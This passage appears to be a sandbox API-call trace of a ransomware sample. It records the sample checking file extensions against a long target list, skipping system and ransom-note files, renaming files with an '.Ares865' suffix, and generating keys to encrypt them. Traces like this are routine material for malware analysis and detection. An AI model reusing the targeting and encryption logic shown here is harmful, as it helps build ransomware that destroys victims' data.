lpString2="zip") returned -1 [0058.969] lstrlenW (lpString="tgz") returned 3 [0058.969] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0058.969] lstrlenW (lpString="vbox") returned 4 [0058.969] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0058.969] lstrlenW (lpString="vdi") returned 3 [0058.969] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0058.969] lstrlenW (lpString="vhd") returned 3 [0058.969] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0058.969] lstrlenW (lpString="vhdx") returned 4 [0058.969] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0058.969] lstrlenW (lpString="avhd") returned 4 [0058.969] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0058.969] lstrlenW (lpString="db") returned 2 [0058.969] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0058.969] lstrlenW (lpString="db2") returned 3 [0058.969] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0058.969] lstrlenW (lpString="db3") returned 3 [0058.969] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0058.969] lstrlenW (lpString="dbf") returned 3 [0058.969] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0058.969] lstrlenW (lpString="mdf") returned 3 [0058.970] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0058.970] lstrlenW (lpString="mdb") returned 3 [0058.970] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0058.970] lstrlenW (lpString="sql") returned 3 [0058.970] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0058.970] lstrlenW (lpString="sqlite") returned 6 [0058.970] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0058.970] lstrlenW (lpString="sqlite3") returned 7 [0058.970] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0058.971] lstrlenW (lpString="sqlitedb") returned 8 [0058.971] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0058.971] lstrlenW (lpString="xml") returned 3 [0058.971] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0058.971] lstrlenW (lpString="$er") returned 3 [0058.971] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0058.971] lstrlenW (lpString="4dd") returned 3 [0058.971] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0058.971] lstrlenW (lpString="4dl") returned 3 [0058.971] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0058.971] lstrlenW (lpString="^^^") returned 3 [0058.971] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0058.971] lstrlenW (lpString="abs") returned 3 [0058.971] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0058.971] lstrlenW (lpString="abx") returned 3 [0058.971] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0058.971] lstrlenW (lpString="accdb") returned 5 [0058.971] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0058.971] lstrlenW (lpString="accdc") returned 5 [0058.971] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0058.971] lstrlenW (lpString="accde") returned 5 [0058.971] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0058.971] lstrlenW (lpString="accdr") returned 5 [0058.971] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0058.971] lstrlenW (lpString="accdt") returned 5 [0058.971] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0058.971] lstrlenW (lpString="accdw") returned 5 [0058.971] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0058.971] lstrlenW (lpString="accft") returned 5 [0058.971] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0058.971] lstrlenW (lpString="adb") returned 3 [0058.971] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0058.971] lstrlenW (lpString="adb") returned 3 [0058.971] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0058.971] lstrlenW (lpString="ade") returned 3 [0058.971] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0058.971] lstrlenW (lpString="adf") returned 3 [0058.972] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0058.972] lstrlenW (lpString="adn") returned 3 [0058.972] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0058.972] lstrlenW (lpString="adp") returned 3 [0058.972] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0058.972] lstrlenW (lpString="alf") returned 3 [0058.972] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0058.972] lstrlenW (lpString="ask") returned 3 [0058.972] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0058.972] lstrlenW (lpString="btr") returned 3 [0058.972] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0058.972] lstrlenW (lpString="cat") returned 3 [0058.972] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0058.972] lstrlenW (lpString="cdb") returned 3 [0058.972] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0058.972] lstrlenW (lpString="ckp") returned 3 [0058.972] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0058.972] lstrlenW (lpString="cma") returned 3 [0058.972] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0058.972] lstrlenW (lpString="cpd") returned 3 [0058.972] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0058.972] lstrlenW (lpString="dacpac") returned 6 [0058.972] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0058.972] lstrlenW (lpString="dad") returned 3 [0058.972] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0058.972] lstrlenW (lpString="dadiagrams") returned 10 [0058.972] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0058.972] lstrlenW (lpString="daschema") returned 8 [0058.972] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0058.972] lstrlenW (lpString="db-journal") returned 10 [0058.972] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0058.972] lstrlenW (lpString="db-shm") returned 6 [0058.972] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0058.972] lstrlenW (lpString="db-wal") returned 6 [0058.972] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0058.972] lstrlenW (lpString="dbc") returned 3 [0058.972] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0058.973] lstrlenW (lpString="dbs") returned 3 [0058.973] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0058.973] lstrlenW (lpString="dbt") returned 3 [0058.973] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0058.973] lstrlenW (lpString="dbv") returned 3 [0058.973] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0058.973] lstrlenW (lpString="dbx") returned 3 [0058.973] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0058.973] lstrlenW (lpString="dcb") returned 3 [0058.973] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0058.973] lstrlenW (lpString="dct") returned 3 [0058.973] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0058.973] lstrlenW (lpString="dcx") returned 3 [0058.973] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0058.973] lstrlenW (lpString="ddl") returned 3 [0058.973] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0058.973] lstrlenW (lpString="dlis") returned 4 [0058.973] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0058.973] lstrlenW (lpString="dp1") returned 3 [0058.973] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0058.973] lstrlenW (lpString="dqy") returned 3 [0058.973] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0058.973] lstrlenW (lpString="dsk") returned 3 [0058.973] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0058.973] lstrlenW (lpString="dsn") returned 3 [0058.973] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0058.973] lstrlenW (lpString="dtsx") returned 4 [0058.973] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0058.973] lstrlenW (lpString="dxl") returned 3 [0058.973] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0058.973] lstrlenW (lpString="eco") returned 3 [0058.973] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0058.973] lstrlenW (lpString="ecx") returned 3 [0058.973] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0058.973] lstrlenW (lpString="edb") returned 3 [0058.973] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0058.973] lstrlenW (lpString="epim") returned 4 [0058.974] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0058.974] lstrlenW (lpString="fcd") returned 3 [0058.974] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0058.974] lstrlenW (lpString="fdb") returned 3 [0058.974] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0058.974] lstrlenW (lpString="fic") returned 3 [0058.974] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0058.974] lstrlenW (lpString="flexolibrary") returned 12 [0058.974] lstrlenW (lpString="fm5") returned 3 [0058.974] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0058.974] lstrlenW (lpString="fmp") returned 3 [0058.974] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0058.974] lstrlenW (lpString="fmp12") returned 5 [0058.974] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0058.974] lstrlenW (lpString="fmpsl") returned 5 [0058.974] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0058.974] lstrlenW (lpString="fol") returned 3 [0058.974] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0058.974] lstrlenW (lpString="fp3") returned 3 [0058.974] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0058.974] lstrlenW (lpString="fp4") returned 3 [0058.974] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0058.974] lstrlenW (lpString="fp5") returned 3 [0058.974] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0058.974] lstrlenW (lpString="fp7") returned 3 [0058.974] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0058.974] lstrlenW (lpString="fpt") returned 3 [0058.974] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0058.974] lstrlenW (lpString="frm") returned 3 [0058.974] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0058.974] lstrlenW (lpString="gdb") returned 3 [0058.974] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0058.974] lstrlenW (lpString="gdb") returned 3 [0058.974] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0058.974] lstrlenW (lpString="grdb") returned 4 [0058.974] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0058.974] lstrlenW (lpString="gwi") returned 3 [0058.975] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0058.975] lstrlenW (lpString="hdb") returned 3 [0058.975] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0058.975] lstrlenW (lpString="his") returned 3 [0058.975] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0058.975] lstrlenW (lpString="ib") returned 2 [0058.975] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0058.975] lstrlenW (lpString="idb") returned 3 [0058.975] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0058.975] lstrlenW (lpString="ihx") returned 3 [0058.975] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0058.975] lstrlenW (lpString="itdb") returned 4 [0058.975] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0058.975] lstrlenW (lpString="itw") returned 3 [0058.975] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0058.975] lstrlenW (lpString="jet") returned 3 [0058.975] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0058.975] lstrlenW (lpString="jtx") returned 3 [0058.975] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0058.975] lstrlenW (lpString="kdb") returned 3 [0058.975] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0058.975] lstrlenW (lpString="kexi") returned 4 [0058.975] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0058.975] lstrlenW (lpString="kexic") returned 5 [0058.975] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0058.975] lstrlenW (lpString="kexis") returned 5 [0058.975] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0058.975] lstrlenW (lpString="lgc") returned 3 [0058.975] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0058.975] lstrlenW (lpString="lwx") returned 3 [0058.975] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0058.975] lstrlenW (lpString="maf") returned 3 [0058.975] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0058.975] lstrlenW (lpString="maq") returned 3 [0058.975] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0058.975] lstrlenW (lpString="mar") returned 3 [0058.975] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0058.976] lstrlenW (lpString="marshal") returned 7 [0058.976] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0058.976] lstrlenW (lpString="mas") returned 3 [0058.976] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0058.976] lstrlenW (lpString="mav") returned 3 [0058.976] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0058.976] lstrlenW (lpString="maw") returned 3 [0058.976] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0058.976] lstrlenW (lpString="mdbhtml") returned 7 [0058.976] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0058.976] lstrlenW (lpString="mdn") returned 3 [0058.976] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0058.976] lstrlenW (lpString="mdt") returned 3 [0058.976] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0058.976] lstrlenW (lpString="mfd") returned 3 [0058.976] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0058.976] lstrlenW (lpString="mpd") returned 3 [0058.976] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0058.976] lstrlenW (lpString="mrg") returned 3 [0058.976] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0058.976] lstrlenW (lpString="mud") returned 3 [0058.976] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0058.976] lstrlenW (lpString="mwb") returned 3 [0058.976] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0058.976] lstrlenW (lpString="myd") returned 3 [0058.976] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0058.976] lstrlenW (lpString="ndf") returned 3 [0058.976] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0058.976] lstrlenW (lpString="nnt") returned 3 [0058.976] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0058.976] lstrlenW (lpString="nrmlib") returned 6 [0058.976] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0058.976] lstrlenW (lpString="ns2") returned 3 [0058.976] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0058.976] lstrlenW (lpString="ns3") returned 3 [0058.976] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0058.976] lstrlenW (lpString="ns4") returned 3 [0058.976] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0058.976] lstrlenW (lpString="nsf") returned 3 [0058.977] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0058.977] lstrlenW (lpString="nv") returned 2 [0058.977] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0058.977] lstrlenW (lpString="nv2") returned 3 [0058.977] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0058.977] lstrlenW (lpString="nwdb") returned 4 [0058.977] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0058.977] lstrlenW (lpString="nyf") returned 3 [0058.977] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0058.977] lstrlenW (lpString="odb") returned 3 [0058.977] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0058.977] lstrlenW (lpString="odb") returned 3 [0058.977] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0058.977] lstrlenW (lpString="oqy") returned 3 [0058.977] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0058.977] lstrlenW (lpString="ora") returned 3 [0058.977] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0058.977] lstrlenW (lpString="orx") returned 3 [0058.977] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0058.977] lstrlenW (lpString="owc") returned 3 [0058.977] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0058.977] lstrlenW (lpString="p96") returned 3 [0058.977] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0058.977] lstrlenW (lpString="p97") returned 3 [0058.977] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0058.977] lstrlenW (lpString="pan") returned 3 [0058.977] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0058.977] lstrlenW (lpString="pdb") returned 3 [0058.977] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0058.977] lstrlenW (lpString="pdm") returned 3 [0058.977] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0058.977] lstrlenW (lpString="pnz") returned 3 [0058.977] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0058.977] lstrlenW (lpString="qry") returned 3 [0058.977] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0058.983] lstrlenW (lpString="qvd") returned 3 [0058.983] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0058.983] lstrlenW (lpString="rbf") returned 3 [0058.983] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0058.983] lstrlenW (lpString="rctd") returned 4 [0058.983] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0058.983] lstrlenW (lpString="rod") returned 3 [0058.983] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0058.983] lstrlenW (lpString="rodx") returned 4 [0058.983] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0058.983] lstrlenW (lpString="rpd") returned 3 [0058.983] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0058.983] lstrlenW (lpString="rsd") returned 3 [0058.983] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0058.983] lstrlenW (lpString="sas7bdat") returned 8 [0058.983] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0058.983] lstrlenW (lpString="sbf") returned 3 [0058.983] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0058.983] lstrlenW (lpString="scx") returned 3 [0058.983] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0058.983] lstrlenW (lpString="sdb") returned 3 [0058.983] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0058.983] lstrlenW (lpString="sdc") returned 3 [0058.983] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0058.983] lstrlenW (lpString="sdf") returned 3 [0058.983] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0058.983] lstrlenW (lpString="sis") returned 3 [0058.983] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0058.983] lstrlenW (lpString="spq") returned 3 [0058.983] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0058.983] lstrlenW (lpString="te") returned 2 [0058.983] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0058.983] lstrlenW (lpString="teacher") returned 7 [0058.983] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0058.984] lstrlenW (lpString="tmd") returned 3 [0058.984] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0058.984] lstrlenW (lpString="tps") returned 3 [0058.984] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0058.984] lstrlenW (lpString="trc") returned 3 [0058.984] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0058.984] lstrlenW (lpString="trc") returned 3 [0058.984] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0058.984] lstrlenW (lpString="trm") returned 3 [0058.984] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0058.984] lstrlenW (lpString="udb") returned 3 [0058.984] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0058.984] lstrlenW (lpString="udl") returned 3 [0058.984] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0058.984] lstrlenW (lpString="usr") returned 3 [0058.984] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0058.984] lstrlenW (lpString="v12") returned 3 [0058.984] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0058.984] lstrlenW (lpString="vis") returned 3 [0058.984] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0058.984] lstrlenW (lpString="vpd") returned 3 [0058.984] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0058.984] lstrlenW (lpString="vvv") returned 3 [0058.984] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0058.984] lstrlenW (lpString="wdb") returned 3 [0058.984] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0058.984] lstrlenW (lpString="wmdb") returned 4 [0058.984] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0058.984] lstrlenW (lpString="wrk") returned 3 [0058.984] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0058.984] lstrlenW (lpString="xdb") returned 3 [0058.984] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0058.984] lstrlenW (lpString="xld") returned 3 [0058.984] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0058.984] lstrlenW (lpString="xmlff") returned 5 [0058.984] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0058.984] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\SendTo\\Desktop.ini.Ares865") returned 48 [0058.985] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\SendTo\\Desktop.ini" (normalized: "c:\\users\\default user\\sendto\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\SendTo\\Desktop.ini.Ares865" (normalized: "c:\\users\\default user\\sendto\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0058.987] CreateFileW (lpFileName="C:\\Users\\Default User\\SendTo\\Desktop.ini.Ares865" (normalized: "c:\\users\\default user\\sendto\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0058.987] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=558) returned 1 [0058.987] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.987] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0058.987] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.987] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0058.988] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0058.988] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.988] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x530, lpName=0x0) returned 0x15c [0058.996] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x530) returned 0x190000 [0058.999] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0059.000] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0059.000] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0059.000] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0059.000] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0059.000] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0059.000] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0059.000] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0059.000] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0059.000] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cbdb0 [0059.000] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0059.000] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbdb0 | out: hHeap=0x2b0000) returned 1 [0059.000] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0059.000] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0059.000] CloseHandle (hObject=0x15c) returned 1 [0059.001] CloseHandle (hObject=0x164) returned 1 [0059.002] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0059.002] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0059.002] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0059.002] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x63dece0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x63dece0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf9b7c855, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents.mydocs", cAlternateFileName="DOCUME~1.MYD")) returned 1 [0059.002] lstrcmpiW (lpString1="Documents.mydocs", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.002] lstrcmpiW (lpString1="Documents.mydocs", lpString2="aoldtz.exe") returned 1 [0059.002] lstrcmpiW (lpString1="Documents.mydocs", lpString2=".") returned 1 [0059.002] lstrcmpiW (lpString1="Documents.mydocs", lpString2="..") returned 1 [0059.002] lstrcmpiW (lpString1="Documents.mydocs", lpString2="windows") returned -1 [0059.002] lstrcmpiW (lpString1="Documents.mydocs", lpString2="bootmgr") returned 1 [0059.003] lstrcmpiW (lpString1="Documents.mydocs", lpString2="temp") returned -1 [0059.003] lstrcmpiW (lpString1="Documents.mydocs", lpString2="pagefile.sys") returned -1 [0059.003] lstrcmpiW (lpString1="Documents.mydocs", lpString2="boot") returned 1 [0059.003] lstrcmpiW (lpString1="Documents.mydocs", lpString2="ids.txt") returned -1 [0059.003] lstrcmpiW (lpString1="Documents.mydocs", lpString2="ntuser.dat") returned -1 [0059.003] lstrcmpiW (lpString1="Documents.mydocs", lpString2="perflogs") returned -1 [0059.003] lstrcmpiW (lpString1="Documents.mydocs", lpString2="MSBuild") returned -1 [0059.003] lstrlenW (lpString="Documents.mydocs") returned 16 [0059.003] lstrlenW (lpString="C:\\Users\\Default User\\SendTo\\Desktop.ini") returned 40 [0059.003] lstrcpyW (in: lpString1=0x2cce43a, lpString2="Documents.mydocs" | out: lpString1="Documents.mydocs") returned="Documents.mydocs" [0059.003] lstrlenW (lpString="Documents.mydocs") returned 16 [0059.003] lstrlenW (lpString="Ares865") returned 7 [0059.003] lstrcmpiW (lpString1=".mydocs", lpString2="Ares865") returned -1 [0059.003] lstrlenW (lpString=".dll") returned 4 [0059.003] lstrcmpiW (lpString1="Documents.mydocs", lpString2=".dll") returned 1 [0059.003] lstrlenW (lpString=".lnk") returned 4 [0059.003] lstrcmpiW (lpString1="Documents.mydocs", lpString2=".lnk") returned 1 [0059.003] lstrlenW (lpString=".ini") returned 4 [0059.003] lstrcmpiW (lpString1="Documents.mydocs", lpString2=".ini") returned 1 [0059.003] lstrlenW (lpString=".sys") returned 4 [0059.003] lstrcmpiW (lpString1="Documents.mydocs", lpString2=".sys") returned 1 [0059.003] lstrlenW 